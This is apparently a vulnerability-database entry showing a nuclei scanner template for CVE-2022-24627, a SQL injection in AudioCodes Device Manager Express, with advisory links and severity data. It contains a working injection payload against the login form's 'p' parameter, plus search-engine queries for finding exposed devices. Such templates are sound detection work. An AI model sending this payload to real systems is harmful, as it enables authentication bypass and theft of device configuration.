AudioCodes Device Manager Express - SQL Injection

04 Jul 2026 03:00:48 | Reported by ProjectDiscovery | Type: nuclei | github.com | 62 Views

AudioCodes Device Manager Express SQL Injection CVE-2022-2462

Related

Reporter | Title | Published | Family
0day.today | Device Manager Express 7.8.20002.47752 SQL Injection / XSS / Code Execution / Traversal | 27 Feb 2023 00:00 | zdt
ATTACKERKB | CVE-2022-24627 | 29 May 2023 21:15 | attackerkb
Circl | CVE-2022-24627 | 30 May 2023 00:36 | circl
CNNVD | AudioCodes Device Manager Express SQL Injection Vulnerability | 24 Feb 2023 00:00 | cnnvd
CVE | CVE-2022-24627 | 29 May 2023 00:00 | cve
Cvelist | CVE-2022-24627 | 29 May 2023 00:00 | cvelist
Exploit DB | Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE) | 30 Mar 2023 00:00 | exploitdb
NVD | CVE-2022-24627 | 29 May 2023 21:15 | nvd
OSV | CVE-2022-24627 | 29 May 2023 21:15 | osv
Packet Storm | Device Manager Express 7.8.20002.47752 SQL Injection / XSS / Code Execution / Traversal | 23 Feb 2023 00:00 | packetstorm

id: CVE-2022-24627

info:
  name: AudioCodes Device Manager Express - SQL Injection
  author: geeknik
  severity: critical
  description: |
    An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
  impact: |
    Unauthenticated attackers can exploit SQL injection in the login form to bypass authentication, extract sensitive VoIP configuration data, and potentially gain administrative access to the AudioCodes Device Manager system.
  remediation: |
    Update AudioCodes Device Manager Express to a version newer than 7.8.20002.47752 that uses parameterized queries and properly validates input.
  reference:
    - https://seclists.org/fulldisclosure/2023/Feb/12
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24627
    - https://github.com/tr3ss/newclei
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24627
    cwe-id: CWE-89
    epss-score: 0.26389
    epss-percentile: 0.97757
    cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: audiocodes
    product: device_manager_express
    shodan-query:
      - title:"Audiocodes"
      - http.title:"audiocodes"
    fofa-query: title="audiocodes"
    google-query: intitle:"audiocodes"
  tags: cve,cve2022,seclists,sqli,audiocodes,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "audiocodes</title>")'
        internal: true

  - raw:
      - |
        POST /admin/AudioCodes_files/process_login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&password=&domain=&p=%5C%27or+1%3D1%23

    matchers:
      - type: word
        part: body
        words:
          - "SQL syntax"
          - "mysql_fetch"
          - "You have an error in your SQL syntax"
        condition: or
# digest: 4a0a0047304502206d2ae4ae79c51d6e33ef217b93a98130432de895a97ca4bf73fd5ddf6dd9725b022100afd4ac64d1d5306c7f3117051a13313d969ddc04bd28c89fe2885240d64ee910:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (Current)
Vulners AI Score: 7.2 (High risk)
CVSS 3.1: 9.8
EPSS: 0.26389